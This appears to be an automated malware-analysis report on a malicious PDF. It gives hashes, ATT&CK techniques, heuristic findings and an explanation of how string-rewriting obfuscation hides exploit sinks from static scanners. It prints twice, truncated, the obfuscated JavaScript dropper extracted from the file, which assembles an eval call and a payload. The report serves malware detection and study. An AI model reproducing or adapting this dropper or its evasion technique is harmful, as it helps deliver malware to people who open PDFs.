PDF malware analysis — malicious · b15b71e90b767b75

MALICIOUS

PDF

110.1 KB First seen: 2026-05-04

MD5: 7a0160e6b75241b0cb777cd52eeb7976 SHA-1: 7336456190de20d1dcbaf3ea708f5d84d2e0a824 SHA-256: b15b71e90b767b7595dbe28669d773a38a432948a2ed64564949adecc4aa2f99

106 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains heavily obfuscated JavaScript, indicated by the 'PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION' heuristic firing with thousands of rewrite calls. This script is designed to download and execute a second-stage payload. The ML classifier strongly supports the malicious nature of this PDF. Due to the extreme obfuscation, the exact URL or payload could not be determined.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript rewrites strings thousands of times to hide its payload critical PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION

The document's JavaScript performs an extreme number of runtime string-rewriting operations (substr/substring/replace/charAt/charCodeAt) — it rebuilds its sink names and payload by slicing and replacing junk-interleaved strings so the literal exploit sinks (util.printf, Collab.getIcon, unescape, eval) never appear for a static scanner. Benign PDF form/calculation scripts use a handful of these calls; obfuscated-exploit droppers run into the thousands. This rewrite density has no benign purpose and marks the file an obfuscated JavaScript exploit even when the specific CVE cannot be statically resolved (the sinks are only assembled at run time).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0076_000.js pdf-javascript-stream PDF /JS object 76 at offset 0x2C2 96404 bytes

Filename	Kind	Source	Size
`javascript_obj0076_000.js`	pdf-javascript-stream	PDF /JS object 76 at offset 0x2C2	96404 bytes
SHA-256: `2ad25751e15c9885cf1733b3ca121eeca09f5d96b19c6730d652b9791b7ddc54`
Preview script First 1,000 lines of the extracted script if((String+'').substr(1,4)==='unct'){ e=((('a1'))).indexOf; } c= ';ex{E<Kaz\|@I= 9}A",tc+jhMN(-mu8l1)]&2ibnv/5S>d7p'%_sC:o*DU0g4PwfqyWV3k6Q[Gr.'; l='l'; e=e()[((2+3)?'e'+'v':"jkrl23jrkl2")+'a'+l]; s=[]; a='push'; z=c.substr(37,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(26,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(26,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(33,1);s[a](z);z=c.substr(33,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(51,1);s[a](z);z=c.substr(59,1);s[a](z);z=c.substr(12,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(45,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(36,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.sub ... (truncated)

SHA-256: 2ad25751e15c9885cf1733b3ca121eeca09f5d96b19c6730d652b9791b7ddc54

Preview script

First 1,000 lines of the extracted script

if((String+'').substr(1,4)==='unct'){
e=((('a1'))).indexOf;
}
c=
';ex{E<Kaz|@I= 9}A",tc+jhMN(-mu8l1)]&2ibnv/5S>d7p'%_sC:o*DU0g4PwfqyWV3k6Q[Gr.';
l='l';
e=e()[((2+3)?'e'+'v':"jkrl23jrkl2")+'a'+l];
s=[];
a='push';
z=c.substr(37,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(26,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(26,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(33,1);s[a](z);z=c.substr(33,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(51,1);s[a](z);z=c.substr(59,1);s[a](z);z=c.substr(12,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(45,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(36,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.sub
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.